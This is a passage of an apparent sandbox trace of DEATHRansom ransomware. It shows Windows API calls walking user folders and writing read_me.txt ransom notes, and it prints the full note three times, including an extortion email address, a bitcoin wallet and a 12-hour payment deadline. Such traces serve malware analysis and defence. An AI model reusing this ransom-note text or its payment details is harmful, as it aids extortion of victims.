Addend=0x40f170) returned 69 [0074.127] QueueUserWorkItem (Function=0x40a710, Context=0x8b50020, Flags=0x0) returned 1 [0074.127] GetProcessHeap () returned 0x280000 [0074.127] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ae00d0 [0074.127] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 44 [0074.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.128] lstrcpyW (in: lpString1=0x8bd0048, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ" [0074.128] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 70 [0074.128] QueueUserWorkItem (Function=0x40a710, Context=0x8bd0048, Flags=0x0) returned 1 [0074.128] GetProcessHeap () returned 0x280000 [0074.128] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8be0050 [0074.129] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\*") returned 63 [0074.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f1f510, ftCreationTime.dwHighDateTime=0x1d4d302, ftLastAccessTime.dwLowDateTime=0x87cc4500, ftLastAccessTime.dwHighDateTime=0x1d4d3cb, ftLastWriteTime.dwLowDateTime=0x87cc4500, ftLastWriteTime.dwHighDateTime=0x1d4d3cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0074.130] lstrcpyW (in: lpString1=0x8bf1060, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np" [0074.130] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 71 [0074.130] QueueUserWorkItem (Function=0x40a710, Context=0x8bf1060, Flags=0x0) returned 1 [0074.130] GetProcessHeap () returned 0x280000 [0074.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c01068 [0074.131] wnsprintfW (in: pszDest=0x8c01068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\*") returned 76 [0074.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x467f8aa0, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x423c55b0, ftLastAccessTime.dwHighDateTime=0x1d4cee5, ftLastWriteTime.dwLowDateTime=0x423c55b0, ftLastWriteTime.dwHighDateTime=0x1d4cee5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.194] lstrcpyW (in: lpString1=0x8c11070, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\vTT7imMuS" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\vTT7imMuS") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\vTT7imMuS" [0074.194] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 72 [0074.194] QueueUserWorkItem (Function=0x40a710, Context=0x8c11070, Flags=0x0) returned 1 [0074.194] GetProcessHeap () returned 0x280000 [0074.194] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b30010 [0074.194] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\vTT7imMuS\\*") returned 86 [0074.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Gy7pNjw6e4Np\\vTT7imMuS\\*", lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e748a30, ftCreationTime.dwHighDateTime=0x1d4cee3, ftLastAccessTime.dwLowDateTime=0x62615ae0, ftLastAccessTime.dwHighDateTime=0x1d4d4ba, ftLastWriteTime.dwLowDateTime=0x62615ae0, ftLastWriteTime.dwHighDateTime=0x1d4d4ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0074.271] lstrcpyW (in: lpString1=0x8c01068, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Qr0Sm9_VPLPJ92NjOJl" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Qr0Sm9_VPLPJ92NjOJl") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Qr0Sm9_VPLPJ92NjOJl" [0074.271] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 73 [0074.271] QueueUserWorkItem (Function=0x40a710, Context=0x8c01068, Flags=0x0) returned 1 [0074.271] GetProcessHeap () returned 0x280000 [0074.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b30010 [0074.272] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Qr0Sm9_VPLPJ92NjOJl\\*") returned 83 [0074.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\Qr0Sm9_VPLPJ92NjOJl\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x689ab7f0, ftCreationTime.dwHighDateTime=0x1d4c79d, ftLastAccessTime.dwLowDateTime=0x51ff2870, ftLastAccessTime.dwHighDateTime=0x1d4d3a8, ftLastWriteTime.dwLowDateTime=0x51ff2870, ftLastWriteTime.dwHighDateTime=0x1d4d3a8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.319] lstrcpyW (in: lpString1=0x8b30010, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\UQtrMj-c8" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\UQtrMj-c8") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\UQtrMj-c8" [0074.319] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 74 [0074.320] QueueUserWorkItem (Function=0x40a710, Context=0x8b30010, Flags=0x0) returned 1 [0074.320] GetProcessHeap () returned 0x280000 [0074.320] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0074.320] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\UQtrMj-c8\\*") returned 73 [0074.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\UQtrMj-c8\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb57db0, ftCreationTime.dwHighDateTime=0x1d4c959, ftLastAccessTime.dwLowDateTime=0x2fd9c280, ftLastAccessTime.dwHighDateTime=0x1d4ce9b, ftLastWriteTime.dwLowDateTime=0x2fd9c280, ftLastWriteTime.dwHighDateTime=0x1d4ce9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.356] lstrcpyW (in: lpString1=0x8a20070, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0074.356] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 75 [0074.356] QueueUserWorkItem (Function=0x40a710, Context=0x8a20070, Flags=0x0) returned 1 [0074.356] GetProcessHeap () returned 0x280000 [0074.356] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0074.356] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*") returned 45 [0074.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0074.356] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\read_me.txt") returned 55 [0074.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.357] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.357] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.358] CloseHandle (hObject=0x780) returned 1 [0074.358] GetProcessHeap () returned 0x280000 [0074.358] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0074.358] lstrcpyW (in: lpString1=0x8a00060, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0074.358] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 76 [0074.358] QueueUserWorkItem (Function=0x40a710, Context=0x8a00060, Flags=0x0) returned 1 [0074.358] GetProcessHeap () returned 0x280000 [0074.358] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b70030 [0074.358] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned 42 [0074.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0074.359] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\read_me.txt") returned 52 [0074.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.381] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.381] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.382] CloseHandle (hObject=0x780) returned 1 [0074.382] GetProcessHeap () returned 0x280000 [0074.382] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b70030 | out: hHeap=0x280000) returned 1 [0074.383] lstrcpyW (in: lpString1=0x8b70030, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0074.383] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 77 [0074.383] QueueUserWorkItem (Function=0x40a710, Context=0x8b70030, Flags=0x0) returned 1 [0074.383] GetProcessHeap () returned 0x280000 [0074.383] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a10068 [0074.383] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned 47 [0074.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.384] lstrcpyW (in: lpString1=0x8a10068, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0074.384] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 78 [0074.384] QueueUserWorkItem (Function=0x40a710, Context=0x8a10068, Flags=0x0) returned 1 [0074.384] GetProcessHeap () returned 0x280000 [0074.384] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c21078 [0074.384] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned 44 [0074.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.491] lstrcpyW (in: lpString1=0x8c21078, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0074.491] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 79 [0074.491] QueueUserWorkItem (Function=0x40a710, Context=0x8c21078, Flags=0x0) returned 1 [0074.491] GetProcessHeap () returned 0x280000 [0074.491] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8be0050 [0074.491] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned 42 [0074.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0074.492] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\read_me.txt") returned 52 [0074.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.537] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.537] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.538] CloseHandle (hObject=0x780) returned 1 [0074.539] GetProcessHeap () returned 0x280000 [0074.539] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8be0050 | out: hHeap=0x280000) returned 1 [0074.539] 